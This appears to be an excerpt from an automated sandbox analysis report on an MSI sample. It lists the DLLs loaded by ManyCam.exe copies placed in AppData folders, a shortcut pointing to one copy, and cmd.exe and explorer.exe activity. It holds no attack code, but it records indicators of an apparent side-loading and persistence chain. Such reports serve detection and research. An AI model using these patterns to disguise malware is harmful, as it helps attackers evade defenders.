Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: ffjc.6.dr

LNK file: ..\..\Roaming\gjs_channel_x86\ManyCam.exe

Source: C:\Windows\SysWOW64\cmd.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: kvW4hZu9JA.msi

Static file information: File size 2850816 > 1048576

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb0 source: ManyCam.exe, 00000002.00000003.1722253839.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728838914.0000000010062000.00000002.00000001.01000000.00000004.sdmp, ManyCam.exe, 00000004.00000002.1782423953.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 0000000D.00000002.2146322134.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 00000014.00000002.2265644240.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, cximagecrt.dll.2.dr
